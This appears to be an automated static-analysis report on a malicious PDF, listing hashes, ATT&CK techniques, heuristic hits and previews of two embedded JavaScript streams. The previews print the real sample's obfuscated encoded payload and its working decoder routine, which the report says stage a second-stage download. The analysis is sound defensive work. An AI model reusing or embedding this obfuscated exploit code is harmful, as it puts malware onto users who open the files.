Malicious PDF — malware analysis report

Static analysis result for SHA-256 74b777a3fd846c41…

MALICIOUS

PDF

2.6 KB
MD5: d5cfab14551e04af16072f8e0187c26e SHA-1: 2dcec6215f283d6147ffbf3e86d9b9755323edd9 SHA-256: 74b777a3fd846c41ca30f26ff7deb12799587e182ce6160ae9f1e47a01f0a860
116 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that contains embedded JavaScript. Heuristics indicate that this JavaScript is likely part of an exploit cluster, specifically using String.fromCharCode for obfuscation. The JavaScript streams are designed to download and execute a second-stage payload, as evidenced by the deobfuscation logic and the large amount of encoded data within the first script. The ML classifier strongly flags this PDF as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj263984_000.js
c00d191bf3b27b32ad543d64884896dec301afad08f9ae66a1518c8f48ec6e12		 pdf-javascript-stream PDF /JS object 263984 at offset 0x197 2432 bytes
Preview script
First 1,000 lines of the extracted script
imbvflh="0T1E1Z1f2Z1d3P1`1a242R1^3a1[2L2U1R1W3K1U2b1S3Z3_1P2]1L1M272f1J3^1H3S1F3f3h1=1B3`1@2_1>3N3Y0`1:3M183L163d1.11122Y2e1/2T2W0g0j1*3/330h3+3-0c0d3G3T0a3=3E0^2[0[3]0Y2h0W3b0U2V2g0:0K0P2O0N2d0L3V3X0I2J0G2^0A0D2S0B3I3Q0=0>3W3c0;2X3R06072`3O042a2c";bpysg=".Nf,dgY9:MehXMcX7E.H9/Qh>a^b-gF0?=hIQ_a_7E.H9/UeECfVYI_b?0Sj`7VhZj1+O??7L91L`-feP[1M[BeF0?;j8-4SV;cg@Sh=BM[cWI1ND9/bMeHf0JjTPaHPcR`ZeF0?=aO_HQSV;cg@8Q+Kj8--JZc6TK[1TY7Y5RM^[0`9TQ`iSY=^[0ZacG8-4RF;eP6Sh:AR6+J6+K_c6TK[1T2VVh=eJY?***+_c6TK[1T5.E=5N@Sh<=eHB:WR_HK6WJ:P0[_3K@G,<CP:J+YZJ**:P5*.3TbaK58+D.d=*K/*/R:Uf+,H_-2:04,.4-aR:L^P:LJhT.`R9K9D,>3C<JK/+e_3f;=2<^/+,B?Q:PD`V2**e.+Z+,7,bB:14a.**,._:8K/Xbc:*+_3JJ,.i@E,Hf<:PDZ_2**e.ZZ+,H1I,**+,,.*:LWON2**e.i:+,Hf<:PDZ_2**e.Vc*K*F5R=]67,@]=2:-GD.**,..`c:K<J,.jZe.VC^2=@OG,6fGK50+>3gJ,.haNK/BZ_2**D.ZZ+,<Z:R:1BD.**,._Q]K00h_2+V,.**,.Z67,<Z:R:1C_2**.2*F<.*83,D=d:M-He.+aE,**+,I5-:QX_N2?f-:J*+R=-*.2*F<.@*:R:6cN3S9O,67fR:1CV2**.22@0K6352:*+_3gJ,.haNK6`KR:*+_3KJ,.g8i.**,..2*K/E52:*+_3gJ,.haNK6`KR:*+_3CZ+,*cA:QNBD.WNP:J0fB:**2:=AK,/4*2=j-R<[Q6K7D?_2^Wa.VB/:Q]*2=bD<.?M-:J*+R=-*.35+,K*GKR:**2=<I4.BEb:J0Z2:**2=*Z_35+,K*GQ:J**:J+[2:*cN3S9O,67fR:1CV2**.3gV7,Hf<:K8BD.**7,BB*K*-L:LZ,/,+Q.K73gR;KYG,*f7K***K+,Z_3K3C,**8K35*.3JV@K63PZP7C4.CE9K***K***K***K***K***K***K***K***K8[;>3LLO:Q5GN3J/+,/4d_2SbI,4B*:Q8c>2SQ4K87_R=Q/0K,S/0K*+=R=V>?,B+<R=K/0K/8e_3]X?,GK;R:T[?R=,J,.fHO,/HU2=UGN2__*:JMI4..?gR;J@,.4ZPZKS,@K9N2T.Vc>R;U@+,*/P:J**:M@+D.*^PR:**2:LbG,IJ@K*6dT.**,.4-aR=f/I,8B^R;U*W,*C^>2**.2_We_2+Q,K***K*V;D.F`i:J*+R:M:+,+BL_2dUgK**-:P**:K/L7:Qc/R:-8DK***K6_M>2V`C_3Q.@K9Z5:J0F`,**+,6fd:L[A]K+6[_2=K@K,OC4.^:?,D_T_3Pf4.@G4_2/W,.6?i:J*+R<^J,.OZXK,5G_3R6G,+B-:MKIN2**D.i:+,.@C_3i+D.*^PR:**2=@P@K*+Z:J**:J**:J**:J**:J**:J**:J**:Q]*2;^Ad,**0K6c*K7j,R::Vi..2:R=7Z>2-L7:QJ^B;STaZJ04?,DWU>3P6W,4CKR;:O5:KW?V2SLO:J*SN3KV].>S=2:RUK:Q6fB=QF4.[A4K/GZR=PG4.>fVK,J*2=Xd>2>+@:KWd>2?jC,*1C,/0e_2?EQ:KWfc=Y4,.*,JK,OGg2>+<R:ZU.K8gZR=W4?,GBaZQ5F4.dKK:K:0a.4-YK8OB>3C?OR<:**hF8Q+O>82h;dO`7Vh9T5.E=5N@YSWQX]hj=G>BeF0?:cM`=E9=eL559>bG-=^5TECe1e,hWhZeF0?:cM`7L91L`9T<I=^,/W0M_323+,<,:-`ZeF0?=BM[cW=eK1`fG1[FDa2gH59eSWQX1=J]T1.HSLe=O^>iRD[O7b:ATJ**,d=F>;CCceF0?:ObT0ML9>[G3]h9T*f=/_Q5_jeBXNdF[aP5S8ARI1eX1cc6TTTgagXL99.E7jBXNdGYO9TE.H9/T1e5.E=5N@8Q+O>I^J]T1.HSFGUZSObeQ`39SdK,aM;e.+J6K*B-+ecG8-4SiY^eED0UMWH/6XjA_a^bCHjSj_S>V7F9]cfAK=5Y`-feO[aY,PAIMSj8-4RYIQ[eUdLg_[0Pj/`bWSh=H`dSL7A^/dSWBAE[H.9SPg^LA0QcgM=I@d1Kdj?H1UWX?[aY,PAIMjF8J";awxlkl=2695;kmcvy=new Array();
javascript_obj263985_001.js
01b70d8333944ff1dfcccc44190b137cf46ee69740b87747350fff0d4267e2e8		 pdf-javascript-stream PDF /JS object 263985 at offset 0x871 492 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);}

Open this report in the interactive analyzer, or submit your own file for analysis.